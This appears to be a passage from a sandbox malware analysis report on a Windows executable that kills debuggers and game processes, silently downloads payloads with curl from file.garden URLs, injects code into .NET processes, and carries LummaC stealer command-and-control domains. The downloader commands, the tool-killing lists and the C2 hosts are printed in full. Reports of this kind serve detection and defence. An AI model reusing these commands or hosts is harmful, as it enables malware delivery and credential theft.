Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T

Injects a PE file into a foreign processes

Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\Speech\rtcore64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 380000 value starts with: 4D5A

LummaC encrypted strings found

Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: strappystyio.shop
Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: coursedonnyre.shop
Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fossillargeiw.shop
Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tendencerangej.shop
Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: appleboltelwk.shop
Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tearrybyiwo.shop
Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: captainynfanw.shop
Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: surveriysiop.shop
Source: physmeme.exe, 00000024.00000002.1493232831.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tiddymarktwo.shop
Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmp	String found in binary or memory: delaylacedmn.site
Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmp	String found in binary or memory: writekdmsnu.site
Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmp	String found in binary or memory: agentyanlark.site
Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmp	String found in binary or memory: bellykmrebk.site
Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmp	String found in binary or memory: underlinemdsj.site
Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmp	String found in binary or memory: commandejorsk.site
Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmp	String found in binary or memory: possiwreeste.site
Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmp	String found in binary or memory: famikyjdiag.site
Source: rtcore64.exe, 00000041.00000002.1566699764.000000006D081000.00000004.00000001.01000000.0000000F.sdmp	String found in binary or memory: explorationmsn.stor

Writes to foreign memory regions

Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45F000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: D68008	Jump to behavior
Source: C:\Windows\Speech\rtcore64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 380000
Source: C:\Windows\Speech\rtcore64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 381000
Source: C:\Windows\Speech\rtcore64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3CB000
Source: C:\Windows\Speech\rtcore64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3CE000
Source: C:\Windows\Speech\rtcore64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 3DE000
Source: C:\Windows\Speech\rtcore64.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 4DC008

Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c color 7	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\imxyvi.exe "C:\Windows\Speech\imxyvi.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/build.bin --output C:\Windows\Speech\rtcore64.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\Speech\rtcore64.exe "C:\Windows\Speech\rtcore64.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles" /IM /F /T >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\sc.exe sc stop HTTPDebuggerPro	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker" /IM /F /T	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\UY9hUZn4CQ.exe	Process created: unknown unknown	Jump to behavior
